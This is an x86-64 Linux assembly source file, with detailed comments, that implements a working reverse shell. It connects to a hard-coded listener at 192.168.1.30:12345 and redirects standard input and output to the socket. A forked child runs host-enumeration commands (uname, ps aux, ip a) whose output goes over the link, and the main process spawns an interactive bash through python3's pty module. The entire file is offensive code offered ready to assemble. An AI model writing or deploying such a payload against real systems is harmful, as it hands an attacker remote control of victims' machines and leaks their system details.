BITS 64
GLOBAL _start
; ------------------------------------------
; SECTION: Uninitialized Data (BSS)
; ------------------------------------------
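SECTION .bss
; Layout of the Linux `struct sockaddr_in` (16 bytes). NASM derives
; `sockaddr_in_size` from this declaration. The trailing sin_zero padding
; belongs to the struct: connect() below is called with addrlen = 16, so the
; kernel copies 16 bytes from the address we pass, and those bytes must be
; ours (and zero) rather than whatever happens to follow in .rodata.
struc sockaddr_in
sin_family resw 1 ; address family (AF_INET)
sin_port resw 1 ; TCP port, network byte order
sin_addr resd 1 ; IPv4 address, network byte order
sin_zero resb 8 ; padding to sizeof(struct sockaddr_in) == 16
endstruc
; Descriptor returned by socket(2). Reserved as a qword because the code
; stores and loads it with 64-bit moves (`mov [sock_fd], rax` / `mov rdi, [sock_fd]`);
; a dword reservation would be written past its end.
sock_fd resq 1
; ------------------------------------------
; SECTION: Read-Only Data (Constants)
; ------------------------------------------
SECTION .rodata
; argv strings for the two execve() calls (NUL-terminated)
sh_cmd db "/usr/bin/python3", 0
arg1 db "-c", 0
arg2 db "import pty; pty.spawn('/bin/bash')", 0
info_cmd db "/bin/sh", 0
info_arg1 db "-c", 0
info_arg2 db "uname -a; uname -m; ps aux; ip a", 0
; diagnostics written by display_error_message (newline-terminated)
err_socket db "[-] Socket creation failed", 10, 0
err_connect db "[-] Connection failed", 10, 0
err_dup2 db "[-] dup2 failed", 10, 0
err_exec db "[-] execve failed", 10, 0
; ------------------------------------------
; SECTION: Network Configuration
; ------------------------------------------
; Hard-coded peer. Both fields are stored so that their in-memory byte order
; is network (big-endian) order: 0x3930 -> bytes 30 39 -> port 12345;
; 0x1E01A8C0 -> bytes C0 A8 01 1E -> 192.168.1.30.
init_struct:
istruc sockaddr_in
at sin_family, dw 2 ; AF_INET (IPv4)
at sin_port, dw 0x3930 ; port 12345, network byte order
at sin_addr, dd 0x1E01A8C0 ; listener address 192.168.1.30, network byte order
at sin_zero, db 0, 0, 0, 0, 0, 0, 0, 0 ; must be zero
iend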
; ------------------------------------------
; SECTION: Code (Main Execution)
; ------------------------------------------
SECTION .text
; Program entry point (static, no libc). The stages below are not functions:
; control falls through label to label
;   _start -> connect_to_host -> redirect_fds -> execute_system_info
;          -> execute_interactive_shell
; and every failed syscall is routed to a matching handle_* label.
; Linux syscall ABI: nr in rax, args in rdi/rsi/rdx, result in rax
; (negative == -errno), rcx and r11 clobbered.
_start:
        ; fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
        mov     eax, 41                 ; SYS_socket
        mov     edi, 2                  ; AF_INET
        mov     esi, 1                  ; SOCK_STREAM
        mov     edx, 6                  ; IPPROTO_TCP
        syscall
        test    rax, rax                ; sign bit set => -errno
        js      handle_socket_error
        mov     [sock_fd], rax          ; keep the fd for connect() and dup2()
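connect_to_host:
        ; connect(sock_fd, &init_struct, sizeof(struct sockaddr_in))
        ; The address is loaded RIP-relative (lea [rel ...]) like the argv
        ; tables elsewhere in this file, instead of as a 64-bit absolute
        ; immediate that only links in a non-PIE image.
        mov     eax, 42                 ; SYS_connect
        mov     rdi, [sock_fd]          ; socket fd
        lea     rsi, [rel init_struct]  ; const struct sockaddr *addr
        mov     edx, 16                 ; addrlen = sizeof(struct sockaddr_in)
        syscall
        test    rax, rax                ; sign bit set => -errno (e.g. ECONNREFUSED)
        js      handle_connect_error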
redirect_fds:
        ; for (newfd = 0; newfd < 3; newfd++) dup2(sock_fd, newfd)
        ; After this loop stdin, stdout and stderr all refer to the socket,
        ; so everything the spawned shell reads or writes goes over the wire.
        ; rsi is both the loop counter and dup2's newfd argument; the syscall
        ; instruction clobbers only rcx/r11, so it survives each iteration.
        xor     esi, esi                ; newfd = 0
.next_fd:
        mov     eax, 33                 ; SYS_dup2
        mov     rdi, [sock_fd]          ; oldfd = socket
        syscall
        test    rax, rax                ; sign bit set => -errno
        js      handle_dup2_error
        inc     rsi
        cmp     esi, 3
        jb      .next_fd
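execute_system_info:
        ; pid = fork()
        ; The child runs a one-shot host-enumeration command; the parent goes
        ; on to spawn the interactive shell. Both inherit fds 0-2 == socket,
        ; so the child's output and the shell share one stream and may
        ; interleave on the peer's side. Nothing waits for the child.
        mov     eax, 57                 ; SYS_fork
        syscall
        test    rax, rax
        ; rax > 0: parent. rax < 0: fork failed -- deliberately treated the
        ; same way, the info dump is best-effort and the shell is still spawned.
        jnz     execute_interactive_shell
        ; rax == 0: child. execve("/bin/sh", info_args, NULL)
        mov     eax, 59                 ; SYS_execve
        lea     rdi, [rel info_cmd]     ; RIP-relative, matching the argv load below
        lea     rsi, [rel info_args]    ; {"/bin/sh", "-c", "uname -a; uname -m; ps aux; ip a", NULL}
        xor     edx, edx                ; envp = NULL
        syscall
        ; execve only returns on failure; terminate the child so it can never
        ; continue into the parent's code path and spawn a second shell.
        jmp     exit_program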
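execute_interactive_shell:
        ; execve("/usr/bin/python3", args, NULL)
        ; python's pty.spawn('/bin/bash') is used so the peer gets a bash
        ; attached to a pseudo-terminal rather than to the bare socket.
        ; Note the absolute interpreter path: with envp = NULL there is no
        ; PATH to search, so this only works where /usr/bin/python3 exists.
        mov     eax, 59                 ; SYS_execve
        lea     rdi, [rel sh_cmd]       ; "/usr/bin/python3"
        lea     rsi, [rel args]         ; {"/usr/bin/python3", "-c", "import pty; pty.spawn('/bin/bash')", NULL}
        xor     edx, edx                ; envp = NULL
        syscall
        ; execve does not return on success, so reaching this point means it
        ; failed. Branch unconditionally instead of on the sign of rax so that
        ; nothing can ever fall through past the end of this stage.
        jmp     handle_exec_error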
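; ------------------------------------------
; ARGUMENT ARRAYS FOR EXECVE
; ------------------------------------------
; argv pointer tables. They are data, so they live in .rodata rather than
; being emitted in the middle of .text (executable data, and a fall-through
; hazard for the code immediately before them). They are reached from code
; via `lea reg, [rel ...]`, which works across sections.
; The entries are 64-bit absolute addresses (R_X86_64_64), which presumably
; matches the non-PIE static link this file is built with; a PIE build would
; need relative tables instead.
SECTION .rodata
align 8
args:
        dq sh_cmd                       ; argv[0] = "/usr/bin/python3"
        dq arg1                         ; "-c"
        dq arg2                         ; "import pty; pty.spawn('/bin/bash')"
        dq 0                            ; NULL terminator
info_args:
        dq info_cmd                     ; argv[0] = "/bin/sh"
        dq info_arg1                    ; "-c"
        dq info_arg2                    ; "uname -a; uname -m; ps aux; ip a"
        dq 0                            ; NULL terminator
SECTION .text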
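; ------------------------------------------
; ERROR HANDLING ROUTINES
; ------------------------------------------
; Each handler writes one diagnostic to fd 2 and terminates the process.
; Messages are loaded RIP-relative (lea [rel ...]) for consistency with the
; other data references in the file rather than as absolute immediates.
; Once redirect_fds has run, fd 2 is the socket, so handle_exec_error's
; message (and the child's) goes to the peer, not to a local terminal.
handle_socket_error:
        lea     rdi, [rel err_socket]
        call    display_error_message
        jmp     exit_program
handle_connect_error:
        lea     rdi, [rel err_connect]
        call    display_error_message
        jmp     exit_program
handle_dup2_error:
        lea     rdi, [rel err_dup2]
        call    display_error_message
        jmp     exit_program
handle_exec_error:
        lea     rdi, [rel err_exec]
        call    display_error_message
        jmp     exit_program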
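; ------------------------------------------
; ERROR PRINTING FUNCTION
; ------------------------------------------
; display_error_message(const char *msg)  -- reached via `call`
; In:    rdi = NUL-terminated message
; Out:   rax = write(2) result (byte count or -errno); callers ignore it
; Clobb: rax, rcx, rdx, rsi, rdi, r11, flags
; The message pointer must be copied into rsi BEFORE rdi is reused for the
; fd; loading the fd first would hand write() the literal 2 as its buffer.
; The length is measured up to the NUL instead of using a fixed byte count,
; so the write never runs past the message into the neighbouring strings.
display_error_message:
        mov     rsi, rdi                ; buf = msg (save before rdi is overwritten)
        xor     edx, edx                ; len = 0
.measure:
        cmp     byte [rsi + rdx], 0     ; stop at the terminating NUL
        je      .write
        inc     rdx
        jmp     .measure
.write:
        mov     eax, 1                  ; SYS_write
        mov     edi, 2                  ; fd = stderr (the socket after redirect_fds)
        syscall                         ; write(2, buf, len)
        ret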
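; ------------------------------------------
; EXIT PROGRAM FUNCTION
; ------------------------------------------
; exit_program: terminate the process. Reached only by `jmp`, never `call`.
; Every path that arrives here is a failure path (a handle_* routine, or the
; child whose execve returned), since a successful execve never returns;
; report that with a non-zero status instead of exit(0).
exit_program:
        mov     eax, 60                 ; SYS_exit
        mov     edi, 1                  ; status = 1: something went wrong
        syscall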